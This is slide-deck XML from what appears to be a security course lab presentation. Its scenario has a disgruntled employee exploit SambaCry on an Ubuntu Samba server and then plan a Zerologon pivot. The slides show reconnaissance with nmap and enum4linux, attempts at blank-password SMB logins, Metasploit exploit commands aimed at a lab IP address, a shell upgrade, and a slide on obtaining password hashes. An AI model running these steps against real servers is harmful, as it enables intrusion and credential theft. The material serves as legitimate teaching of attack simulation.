                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Ensure DHCP is used and the preferred DNS server is configured to the loopback interface.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779975" y="3670025"/>
            <a:ext cx="4587000" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>3. Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="630001" y="212650"/>
            <a:ext cx="6567800" cy="29965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55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="20400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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> Services on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="532" name="Google Shape;532;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1960" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="251550" y="988650"/>
            <a:ext cx="5495774" cy="3850050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5872800" y="909750"/>
            <a:ext cx="3271200" cy="216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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>After connecting to hamachi, we should ensure that kali is able to ping the Ubuntu machine before proceeding with reconnaissance. We will first scan the ubuntu machine for open ports.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Based on our scan, ssh and SMB ports are  open.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>
            <a:ext cx="85206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Enumerating Services on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="539" name="Google Shape;539;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1018075"/>
            <a:ext cx="5510951" cy="2718200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5872800" y="909750"/>
            <a:ext cx="3271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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>To simulate an attack, we will attempt what the attacker normally does -- to try to login to ssh but these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> are blocked.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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1"/>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Case Scenario</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639025" y="1727100"/>
            <a:ext cx="5576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400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t> is a disgruntled employee of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Company13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t>. During COVID-19, the company deployed the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es" sz="1400"/>
              <a:t>Hamachi VPN service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t> to allow employees to work from home, to access the company file shares via the Samba protocol hosted on an Ubuntu File server. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t>Mel decides to use this opportunity to attack the outdated version of Samba and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>compromise the server using SambaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t>. Since the Samba File Server has an interface communicating with Active Directory Domain, Mel can pivot to and exploit the Domain Controller with the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Zerologon vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t> to steal domain credentials and exfiltrate the company’s data.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="267" name="Google Shape;267;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512025" y="1631050"/>
            <a:ext cx="2631974" cy="264115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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="20400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Enumerating Services on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Google Shape;546;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817425" y="4412200"/>
            <a:ext cx="7863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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Similarly, we can also enumerate SMB share on the linux machine using enum4linux and the results show that it is most likely vulnerable since SMBv1 is used.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1351" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="95450" y="865700"/>
            <a:ext cx="5059801" cy="3348224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="548" name="Google Shape;548;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4703675" y="865700"/>
            <a:ext cx="4487570" cy="33482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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="20400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Enumerating Services on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640050" y="3762400"/>
            <a:ext cx="7863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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can try to login to the SMB share using Administrator and Anonymous since these are the 2 accounts commonly used for login (check if password is blank or bruteforce). We are able to login (due to the configuration file in the ubuntu machine) but cannot compromise the machine by this method (restricted only to the share folder at /home/smbshare). As shown above directory traversal does not work.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="555" name="Google Shape;555;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="4425"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="805275" y="810600"/>
            <a:ext cx="6756676" cy="2896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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="20400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Enumerating Services on Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640050" y="4456275"/>
            <a:ext cx="7863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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can then try to scan the machine with a NSE script to check if it is vul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>nerable to the SambaCry Vulnerability. The results shows it likely is so we can try to exploit it!</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="562" name="Google Shape;562;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="640050" y="720700"/>
            <a:ext cx="6708548" cy="37355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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2656550" y="3670025"/>
            <a:ext cx="5710500" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>04.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> Exploiting SambaCry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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400"/>
              <a:t>Part 1.1: SambaCry (CVE-2017-7494)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="569" name="Google Shape;569;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1423027" y="729400"/>
            <a:ext cx="5341651" cy="27882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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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SambaCry Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Google Shape;575;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="99125" y="918950"/>
            <a:ext cx="5833925" cy="3746549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6037825" y="1174075"/>
            <a:ext cx="2478000" cy="108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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>search CVE-2017-7494</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>use 0</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>options</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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SambaCry Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="582" name="Google Shape;582;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1189375"/>
            <a:ext cx="8839201" cy="2663957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3298150" y="3332800"/>
            <a:ext cx="6076800" cy="108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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>set rhosts 25.12.156.134</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (ham0 on ubuntu)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>python -c “import pty; pty.spawn(‘/bin/bash’)”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852550" y="3670025"/>
            <a:ext cx="6514500" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>05.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Ubuntu Post-Exploits </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="589" name="Google Shape;589;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5494150" y="427750"/>
            <a:ext cx="2343150" cy="24384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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Obtaining the password hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
